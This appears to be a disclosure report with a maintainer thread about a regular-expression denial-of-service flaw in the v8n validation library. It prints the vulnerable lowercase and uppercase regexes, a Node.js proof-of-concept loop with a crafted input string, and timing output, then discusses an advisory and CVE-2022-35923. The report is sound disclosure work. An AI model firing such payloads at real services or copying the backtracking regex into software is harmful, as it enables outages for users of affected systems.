Inefficient Regular Expression Complexity potentially leads to Denial of Service in in imbrn/v8n
Reported on
Jun 29th 2022
Description
Inefficient regular expression complexity of lowercase()
and uppercase()
regex could lead to a denial of service attack. With a formed payload 'a' + 'a'.repeat(i) + 'A'
, only 32
characters payload could take 29443 ms time execution when testing lowercase()
. The same issue happens with uppercase()
.
Proof of Concept
// PoC.js
const v8n = require('v8n')
for (var i = 1; i <= 1000; i++) {
var time = Date.now();
var attack_str = 'a' + 'a'.repeat(i) + 'A'
v8n().lowercase().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
Output
attack_str.length: 26: 434 ms
attack_str.length: 27: 868 ms
attack_str.length: 28: 1876 ms
attack_str.length: 29: 3641 ms
attack_str.length: 30: 7899 ms
attack_str.length: 31: 14900 ms
attack_str.length: 32: 29443 ms
Impact
Potentially causes a denial of service attack
Occurrences
v8n.js L194
uppercase: () => value => /^([A-Z]+\s*)+$/.test(value),
v8n.js L191
lowercase: () => value => /^([a-z]+\s*)+$/.test(value),
SECURITY.md
a year ago
Thank you for the report. The suggested patch by @doublevkay was actually partially correct accordingly to the v8n requirements.
Hey @imbrn @maintainer. Great to see your response.
Could we add a GitHub Security Advisory (GSA) for this vulnerability? It is a good practice to publish vulnerabilities and helps users be aware of the issue. As a researcher, being credited on GSA is my pleasure and helps my work too.
Hello @vovikhangcdv. For sure! And thank you for the amazing work.
Hey @imbrn, how is it going?
Apologize for annoying you. But in case we misunderstand some things, I want to make clear that adding GHSA is a maintainer's work part. I don't have the authorization to do it either.
Hi @imbrn, any update for the Security Advisories?
Hi there, can we assign CVE for this issue? @admin, @maintainer
Happy to assign and publish a CVE.
@imbrn - are you happy for me to assign and publish a CVE for this report?
Hi @jamieslome. I requested a CVE in the Github Advisory. https://github.com/imbrn/v8n/security/advisories/GHSA-xrx9-gj26-5wx9
No worries. Once you get the CVE, if you could just ping over the CVE number, I will add it to this report.
Could we also add a reference for this report to the advisory?
Hi @imbrn, Can i be credited in the advisory? I would approciate it a lot. Thank you!
Sure. I'll credit you and also add a reference to this report.
Thank you, imbrn, The CVE was assgined, Can you help to update it on this report, @admin? https://nvd.nist.gov/vuln/detail/CVE-2022-35923